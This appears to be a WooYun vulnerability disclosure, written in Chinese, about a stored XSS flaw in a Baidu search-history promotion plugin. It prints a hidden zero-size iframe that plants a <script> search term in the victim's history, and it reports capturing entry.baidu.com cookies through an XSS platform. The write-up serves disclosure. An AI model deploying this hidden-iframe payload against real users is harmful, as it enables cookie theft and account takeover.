WooYun.org

用户访问我构造的页面 会在浏览器里留下一个搜索记录 推广代码在进入页面的时候 把这个记录提取出来 当然这时候我们肯定要思考一个问题 那么多搜索记录 总不可能一次性提取显示出来把 是的 他会按网站页面的关键字去处理这一个问题！
这里我拿红黑做个演示！

从上图红色箭头指向的就是提取出来之后的关键字！
页面地址：

http://www.2cto.com/Article/200609/12101.html

这里我要声明下 为什么要用这个页面去测试 从上图可以很明显的看到页面充带有 xss的一个介绍和语句 这样插件会提取类似的出来！
其实自己构造个页面也行的 只不过页面中有一定要有 xss语句的关键字 ！

页面代码:

<iframe src="https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E&oq=%3Ciframe%E9%9A%90%E8%97%8F&rsv_pq=9c530e380002e87d&rsv_t=1dffkkKbr1JsW1IHUOLBrby4Beo6UbNvCeo98YV7p%2BtYSOSkB%2BWoPpZ22qQ&rsv_enter=1&inputT=35734&rsv_sug3=49&rsv_sug1=26&rsv_n=2&rsv_sug2=0&rsv_sug4=35734" width=0 height=0 frameborder=0 >

保存为html打开就行了
这时候回到红黑页面刷新！

从上面第一张图中可以看到框框上面显示的网站 entry.baidu.com
也可以看到关键字被提取到了页面 并且执行了
为了确定没什么限制 我自己还用平台测试了下

从上图中可以很清楚看到打到的是entry.baidu.com 的cookies
访问过我们构造的页面之后 浏览器就留下了一条记录了 就算没有特定关键字的网站 有时候进去了 随机提取出来的也一样！只是有关键字存在就能准确！